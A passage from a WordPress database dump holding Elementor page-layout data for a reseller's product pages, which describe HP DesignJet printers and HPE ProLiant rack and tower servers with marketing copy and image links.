solution<\\/h2><\\/div><\\/div><div>Produce sharp, durable prints with the fastest graphics production printing solution, designed to handle production peaks, and that seamlessly integrates into your current workflow.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"29b075c\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\",\"border_color\":\"#e9e9e9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"6edafb9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"27\",\"right\":\"27\",\"bottom\":\"27\",\"left\":\"27\",\"isLinked\":true}},\"elements\":[{\"id\":\"78b2fe7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"font-lh3 \\\" style=\\\"text-align: center;\\\">Meet customer high-quality expectations with the fastest production printing solution<\\/h2><p style=\\\"text-align: center;\\\">Consistent, accurate color across prints and printers with embedded spectrophotometer. Easily create content and submit jobs using HP Applications Center.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6ca232d9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"59b10f23\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"42c95afc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><div><div style=\\\"text-align: center;\\\">To discover more, please click the buttons below or contact us to discuss your needs.<\\/div><\\/div><\\/div><div><div style=\\\"text-align: center;\\\">\\u00a0<\\/div><div style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" ]<\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8339,3626,'_wp_page_template','template-fullwidth.php'),(8340,3626,'_elementor_edit_mode','builder'),(8351,3628,'_wp_page_template','template-fullwidth.php'),(8352,3628,'_elementor_edit_mode','builder'),(8353,3628,'_elementor_template_type','post'),(8354,3628,'_elementor_version','2.5.14'),(8355,3628,'_elementor_data','[{\"id\":\"053623e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"border_border\":\"solid\",\"border_color\":\"#e9e9e9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[{\"id\":\"3436418\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":60,\"space_between_widgets\":0,\"margin\":{\"unit\":\"px\",\"top\":\"32\",\"right\":\"32\",\"bottom\":\"32\",\"left\":\"32\",\"isLinked\":true}},\"elements\":[{\"id\":\"42cc427\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"font-lh3 \\\">HP DesignJet large-format office printers<\\/h2><p>These printers are ideal for individual or multiuser environments, delivering high-quality applications, from black and white CAD drawings to color presentations, while tools like automatic media-roll alignment and accurate print previews help streamline workflows and ensure efficiency.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4aa4bcf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":39.928},\"elements\":[{\"id\":\"3831de6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2502 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HP-DesignJet-T120-Printer.jpg\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"185\\\" \\/><\\/p><h3 style=\\\"text-align: center;\\\"><strong>HP DesignJet T120 Printer<\\/strong><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c500bf0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"border_border\":\"solid\",\"border_color\":\"#e9e9e9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1fe0754\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":39.928,\"space_between_widgets\":0,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"dba6320\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><div><img class=\\\"wp-image-2503 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HP-DesignJet-T1700-Printer-series.jpg\\\" alt=\\\"\\\" width=\\\"196\\\" height=\\\"196\\\" \\/><\\/div><\\/div><div><h3 style=\\\"text-align: center;\\\"><strong>HP DesignJet T1700 Printer series<\\/strong><\\/h3><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fb27127\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":60,\"margin\":{\"unit\":\"px\",\"top\":\"39\",\"right\":\"39\",\"bottom\":\"39\",\"left\":\"39\",\"isLinked\":true}},\"elements\":[{\"id\":\"4f8ff0d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"font-lh3 \\\">The most affordable and compact HP DesignJet printer<\\/h2><div class=\\\"description\\\">The HP DesignJet T120 Printer fits your budget and your space. Install this compact printer where it\'s most convenient, and enjoy wireless connectivity and easy-to-use features.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f91e907\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"border_border\":\"solid\",\"border_color\":\"#e9e9e9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[{\"id\":\"c20d5da\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":60,\"space_between_widgets\":0,\"margin\":{\"unit\":\"px\",\"top\":\"32\",\"right\":\"32\",\"bottom\":\"32\",\"left\":\"32\",\"isLinked\":true}},\"elements\":[{\"id\":\"ae5e9f2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"font-lh3 \\\">Secure, empowering printer for CAD\\/GIS workgroups<\\/h2><div class=\\\"description\\\">Confidently take CAD, GIS color reproduction to the next level with a 44-in HP DesignJet printer that delivers powerful security features, high productivity on even the most complex files, and bright and precise colors. Dynamic security: Cartridges with non-HP chips might not work today or in the future.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"280b7a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":39.928},\"elements\":[{\"id\":\"91df282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2504 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HP-DesignJet-T830-Multifunction-Printer-series.jpg\\\" alt=\\\"\\\" width=\\\"272\\\" height=\\\"181\\\" \\/><\\/p><h3 style=\\\"text-align: center;\\\"><strong>HP DesignJet T830 Multifunction Printer series<\\/strong><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e456065\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\",\"border_color\":\"#e9e9e9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"42de96a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"27\",\"right\":\"27\",\"bottom\":\"27\",\"left\":\"27\",\"isLinked\":true}},\"elements\":[{\"id\":\"7936e9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"font-lh3 \\\" style=\\\"text-align: center;\\\">Smart choice for evolving architect\\/construction offices<\\/h2><div class=\\\"description\\\" style=\\\"text-align: center;\\\">Immediately update all your partners on project review results with the most compact large-format MFP. Intuitive, convenient print\\/scan\\/copy and HP DesignJet print quality help you communicate effectively and move the project forward. Dynamic security: Cartridges with non-HP chips might not work today or in the future.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"83280e0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"border_border\":\"solid\",\"border_color\":\"#e9e9e9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"a59e4fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":39.928,\"space_between_widgets\":0,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"53dfb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><img class=\\\"alignnone wp-image-2505 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HP-DesignJet-T3500-Production-Multifunction-Printer.jpg\\\" alt=\\\"\\\" width=\\\"199\\\" height=\\\"199\\\" \\/><\\/h3><h3 style=\\\"text-align: center;\\\"><strong>HP DesignJet T3500 Production Multifunction Printe<\\/strong>r<\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4d9ae37\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":60,\"margin\":{\"unit\":\"px\",\"top\":\"28\",\"right\":\"28\",\"bottom\":\"28\",\"left\":\"28\",\"isLinked\":true}},\"elements\":[{\"id\":\"711f6cd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>HP DesignJet large-format production printers<\\/h2><p>Turn jobs around in record time with market-leading technology that delivers fast print speeds. Produce AEC, CAD drawings, and high-quality photos, POP\\/POS, posters, canvas, backlits, banners, and event graphics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7893108\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"border_border\":\"solid\",\"border_color\":\"#e9e9e9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[{\"id\":\"8eb8617\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":60,\"space_between_widgets\":0,\"margin\":{\"unit\":\"px\",\"top\":\"48\",\"right\":\"48\",\"bottom\":\"48\",\"left\":\"48\",\"isLinked\":true}},\"elements\":[{\"id\":\"1c947dd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"font-lh3 \\\">Productivity in full color<\\/h2><div class=\\\"description\\\">As the most productive, cost-effective HP DesignJet MFP, HP DesignJet T3500 is built for rigorous IT demands. Meet all your black-and-white and color needs, while enjoying low cost of operation, advanced copy\\/scan features, and unattended operation.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b968bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":39.928},\"elements\":[{\"id\":\"cdb38ed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><img class=\\\"alignnone wp-image-2506 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HP-DesignJet-Z6610-Production-Printer.jpg\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"184\\\" \\/><\\/div><h3 style=\\\"text-align: center;\\\"><strong>HP DesignJet Z6610 Production Printer<\\/strong><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1d87415\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"border_border\":\"solid\",\"border_color\":\"#e9e9e9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"97ed559\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":39.928,\"space_between_widgets\":0,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"f86294e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignnone wp-image-2507 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HP-DesignJet-Z6810-Production-Printer-series.jpg\\\" alt=\\\"\\\" width=\\\"312\\\" height=\\\"166\\\" \\/><\\/p><h3 style=\\\"text-align: center;\\\"><strong>HP DesignJet Z6810 Production Printer series<\\/strong><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1b8cb4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":60,\"margin\":{\"unit\":\"px\",\"top\":\"38\",\"right\":\"38\",\"bottom\":\"38\",\"left\":\"38\",\"isLinked\":true}},\"elements\":[{\"id\":\"4375ff4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><div><h2 class=\\\"font-lh3 \\\">The fastest graphics production printing solution<\\/h2><\\/div><\\/div><div>Produce sharp, durable prints with the fastest graphics production printing solution, designed to handle production peaks, and that seamlessly integrates into your current workflow.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"29b075c\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\",\"border_color\":\"#e9e9e9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"6edafb9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"27\",\"right\":\"27\",\"bottom\":\"27\",\"left\":\"27\",\"isLinked\":true}},\"elements\":[{\"id\":\"78b2fe7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"font-lh3 \\\" style=\\\"text-align: center;\\\">Meet customer high-quality expectations with the fastest production printing solution<\\/h2><p style=\\\"text-align: center;\\\">Consistent, accurate color across prints and printers with embedded spectrophotometer. Easily create content and submit jobs using HP Applications Center.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6ca232d9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"59b10f23\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"42c95afc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><div><div style=\\\"text-align: center;\\\">To discover more, please click the buttons below or contact us to discuss your needs.<\\/div><\\/div><\\/div><div><div style=\\\"text-align: center;\\\">\\u00a0<\\/div><div style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" ]<\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8629,3655,'_wp_trash_meta_time','1571989013'),(8630,3655,'_wp_desired_post_slug',''),(8631,3659,'_elementor_edit_mode','builder'),(8363,1529,'_elementor_edit_mode','builder'),(8372,3629,'_wp_page_template','template-fullwidth.php'),(8371,1529,'_elementor_data','[{\"id\":\"e3617cd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"43a7986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2911cf1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>SERVER AND SYSTEM<\\/h2>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23469e8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7ff144f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"b99977c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Rack Servers<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Rack-optimized servers that modernize your data center by delivering performance, resiliency, and scalability for core business-to-business-critical workloads.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6146b0a\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"6698963\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"5ba2b0b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant DL325 Gen10 Server<\\/strong><\\/h4><hr \\/><p><img class=\\\"wp-image-2509 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-DL325-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"181\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Secure and versatile single socket (1P) 1U AMD EPYC\\u2122 based platform offers an exceptional balance of processor, memory and I\\/O for virtualization and data intensive workloads. With up to 32 cores, up to 16 DIMMs, 2 TB memory capacity and support for up to 10 NVMe drives, this server delivers 2P performance with 1P economics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"75d2a69\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"eb529d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant DL385 Gen10 Server<\\/strong><\\/h4><hr \\/><p><img class=\\\"wp-image-2511 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-DL385-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"181\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Hewlett Packard Enterprise is extending the worlds most secure industry standard servers to include the HPE ProLiant DL385 Gen10 server, utilizing the AMD EPYC 7000 Series processors. This platform has been designed with the security you need and the flexibility you require to accommodate demanding enterprise workloads. With up to 64 cores, up to 32 DIMMs, or 4 TB memory capacity and support for up to 24 NVMe drives, the HPE ProLiant DL385 Gen10 server delivers a low cost virtual machine (VM) with unprecedented security.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"54d4bd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"2796cf3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Apollo 6000 Chassis<\\/strong><\\/h4><hr \\/><p><img class=\\\"alignnone wp-image-2512 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Apollo-6000-Chassis.png\\\" alt=\\\"\\\" width=\\\"235\\\" height=\\\"160\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Apollo k6000 Chassis is designed with density optimization and HPC solution integration in mind to address these demands. The new modular, fully integrated, and highly flexible chassis is designed to hold the Hewlett Packard Enterprise Gen10 compute servers to fit your specific HPC workloads. It accommodates up to 24 HPE ProLiant XL230k Gen 10 Server trays, redundant power and cooling, Ethernet and high speed fabric switches to address various HPC workload needs. It is a performance optimized, air-cooled solution that fits in customer\\u2019s space limitations. This solution offers outstanding configuration flexibility, simplified administration and rack-scale efficiency that lowers the total cost of ownership (TCO) needed for mass scale HPC deployments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"40400cb\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"b8fcbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"2855b1a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"678fabe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"fa51356\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fc8f82c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"4c8fa09\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eecdb46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6841163\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a548724\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23f429a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f63f973\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ef27847\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Tower Servers<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Lower costs, boost productivity and keep your small or midsize business running smoothly with servers that provide the options, tools and support you need.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8df486\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"d2666d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"96abc95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant ML110 Gen10 Server<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2513\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-ML110-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"226\\\" height=\\\"169\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE ProLiant ML110 Gen10 server is an enhanced tower with performance, expansion, and growth at an affordable price. It meets most small- and mid-sized businesses\\u2019 needs as well as accelerates your business compute. The ProLiant ML110 Gen10 is a single processor tower form factor that can also be placed in a rack server cabinet using 4.5U of rack space. It includes up to five PCIe slots with room to grow with eight large form factor (LFF) or 16 small form factor (SFF) disk drives. It provides six DDR4 DIMM slots supporting HPE DDR4 SmartMemory with a maximum capacity of 192 GB. The HPE ProLiant ML110 Gen10 server also offers optional redundant fan and redundant power supply to satisfy automatic fail-over needs, making this the ideal server for small- to mid-sized businesses and remote offices and branch offices.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f088196\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"c202494\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant ML350 Gen10 Server<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2514\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-ML350-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"185\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE ProLiant ML350 Gen10 server delivers a secure dual-socket tower server with performance, expandability, and proven reliability making it the choice for expanding SMBs, remote offices of larger businesses, and enterprise data centers.\\u00a0The shorter re-designed rackable chassis with multiple upgrade options provides flexibility that can expand as your business needs grow. It supports 12 Gb\\/s SAS, NVMe SSD, embedded 4x1GbE NIC with a broad range of graphics and compute options.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6c3f725\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7af140c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1963cc6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"528c188\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d3d82f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton 